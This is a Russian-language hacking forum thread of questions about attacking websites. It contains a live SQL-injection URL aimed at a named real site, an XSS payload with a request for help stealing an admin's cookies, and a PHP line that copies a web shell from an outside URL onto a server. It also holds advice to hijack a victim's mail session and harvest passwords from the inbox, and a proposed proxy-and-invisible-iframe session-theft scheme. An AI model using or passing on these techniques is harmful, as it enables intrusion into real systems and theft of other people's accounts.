Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    второй вариант пробовал?
     
    _________________________
  2. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    Можно ли как-то через веб-шелл ходить по удаленным ресурсам винды типа \\10.32.0.236?
     
  3. SaliVan

    SaliVan New Member

    Joined:
    22 Apr 2012
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    да не чего даже пробовать этот символ "_" не должен присутствовать в запросе.
    надо както зашифровать названия таблицы
     
  4. not_bad

    not_bad Banned

    Joined:
    23 Sep 2012
    Messages:
    172
    Likes Received:
    3
    Reputations:
    0
    Не смотря на количество выкуреных мануалов по кукам, остались у меня еще некоторые вопросы которые хотел бы уточнить.
    1) Первый и самый главный: хранится всетаки или нет в кукисах пароль? Одни говорят одно другие другое. Как я понял он в них может хранится в зашифрованном виде и раньше так и было в основном, сейчас же используется идентификатор сессии а сам пароль передается только при авторизации. Поправьте если что не так.
    2) Как влияет смена ип на сессию? Насколько я понял если стоит привязка к ип то выкинет обратно на страницу авторизации если заходиш с другого компа?
    3) Что будет если ты допустим перехватил постоянные куки или куки которым жить отведено долго достаточно, но юзер авторизовался заново? Перехваченые куки становятся бесполезными и принимать их уже не будет?
    4) Можно ли зайти одновременно с 2х компов с одним куки если ип один и тот же (компы одной сети), и если ип разный?
     
  5. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,185
    Likes Received:
    618
    Reputations:
    690
    можно через гейт воланда тыц
     
    _________________________
  6. vova1609

    vova1609 New Member

    Joined:
    14 Jun 2012
    Messages:
    24
    Likes Received:
    2
    Reputations:
    -7
    Нашел пассивную XSS уязвимость в форме регистрации, то есть ввести
    Code:
    <script>alert("!")</script>
    скрипт выпоняется. Вся проблема в том что нельзя из этого сделать ссылку и кинуть админу чтобы забрать его куки. Есть еще другие методы чтобы раскрутить это дело?
     
  7. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    может быть и так и так, все по рзному скрипты пишут

    нет нету
     
    1 person likes this.
  8. not_bad

    not_bad Banned

    Joined:
    23 Sep 2012
    Messages:
    172
    Likes Received:
    3
    Reputations:
    0
    А поподробнее можно пожалуйста?
     
  9. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Можно попробовать проверить наличие CSRF в форме, если она отображается для залогиненых пользователей.
     
  10. not_bad

    not_bad Banned

    Joined:
    23 Sep 2012
    Messages:
    172
    Likes Received:
    3
    Reputations:
    0
    Хотябы 3 и 4 вопрос поясните плз. Если может быть по разному то как узнать как конкретно на данном сайте делается? Эта информация заложена в самих куках или только на самом сайте? Чтобы не попасть в ситуацию что перехватил куки а через день они уже не работают. Спасибо.
     
  11. skrutcher

    skrutcher New Member

    Joined:
    17 Jul 2011
    Messages:
    17
    Likes Received:
    1
    Reputations:
    0
    берешь и проверяешь. все зависит от того как устроен сам двиг.
     
  12. Улыбайся

    Joined:
    23 Oct 2011
    Messages:
    71
    Likes Received:
    7
    Reputations:
    3
    Почему не выводятся принтабельные поля?
    http://www.aviation.su/index.php?op=modload&mod=News&na=details&id=798+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+--+
     
  13. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    5.0.51a-24+lenny5
     
    _________________________
  14. smirk

    smirk Elder - Старейшина

    Joined:
    8 Sep 2011
    Messages:
    137
    Likes Received:
    43
    Reputations:
    26
    ?
    мож, нет прав на запись файлов в этот каталог, мож allow_url_fopen off
     
  15. skrutcher

    skrutcher New Member

    Joined:
    17 Jul 2011
    Messages:
    17
    Likes Received:
    1
    Reputations:
    0
    copy(shellurl,ПОЛНЫЙ АДРЕС)
     
  16. zloy_fantom

    zloy_fantom New Member

    Joined:
    3 Dec 2012
    Messages:
    46
    Likes Received:
    0
    Reputations:
    0
    Подскажите, плизз программу для подбора паролей, зашифрованных алгоритмом varbinary(256), желательно, с использованием CUDA, Google не помог..... Почему-то
     
  17. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Varbinary это разве хэш, а не бинарная форма записи?
     
  18. Hracid

    Hracid New Member

    Joined:
    18 Nov 2010
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    1. пароли в кукисах давно никто не хранит. максимум хеш пароля, но чаще id сессии. так что ты прав.
    2. в том же mail.ru никак не влияет. вк и прочие тоже.. вообще из общепопулярных ресурсов не встречал пока что бы обрывал сессию из-за смены ip. хотя конечно такое возможно. но может для корпоративных ресурсов с хорошим уровнем безопасности.
    3. если юзер авторизовался заново, старая сессия была закрыта, то тебя нужно будет по новой тырить куки. мой тебе совет, потырил куки от почты, получил сессию, быстро ищешь что есть в почте из паролей, весьма вероятно что один из найденых подойдет и от ящика.
    4. зайти можно. можно даже зайти с разных компов. но опять же это специфически, зависит от ресурса.
     
  19. Hracid

    Hracid New Member

    Joined:
    18 Nov 2010
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    мне кажется я только что изобрел велосипед, но хотелось бы пояснений от людей знающих!
    В общем суть такова:
    1. Поднимаем proxy на своей машине/сервере
    2. Формируем ссылку на атакуемый ресурс «site-name» через данный proxy. т.е. ссылка вида http://proxy:port/http://site-name
    3. Отправляем ссылку жертве
    Получается вполне классический вариант атаки мэн-ин-дэ-мидл. ресурс откроется у жертвы, но через нашу проксю.
    При этом важный момент, жертва уже залогинина на «site-name» у себя в браузере. Т.е. у браузера в куках есть ID сессии.
    Жертва переходит по ссылке, браузер послушно передает куки на «site-name», но трафик то идет через наш proxy и мы можем с легкостью поваровать сессию.
    Вроде как profit.
    При этом думаю стоит различить варианты proxy:
    1. Web-proxy
    2. http\https proxy
    3. ssl proxy
    в общем хотелось бы услышать мнение, возможна ли такая атака?
    Если возможна где можно почитать в подробностях.
    Основной момент что жертве не надо логинится на сайт, если она уже на сайте. Это дает нам возможность спрятать «site-name» в невидимом iframe, а жертве показать картинку с котиком. Но куки то передадуться все равно, даже если сайт не виден.

    Я заранее извиняюсь, но нагуглить хоть что-то похожее у меня не вышло. Видел что-то похожее в BackTrack, но там была эмуляция сайта(SeT), и надо было заставить жертву ввести логин и пароль, а в описанном мной случае мы можем получить сессию не вызывав серьезных подозрений. ну кроме странного урла конечно ) что в принципе решаемо.
     
  20. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    Куки шлются только на домен, установивший их, поэтому провал.

    Да и
    Это как? Ты сам пробовал это? У меня не работает - 502 Bad gateway. Прокси, конечно же, рабочий, если его в браузере прописывать.
     
    #22100 попугай, 19 Apr 2013
    Last edited: 19 Apr 2013
Thread Status:
Not open for further replies.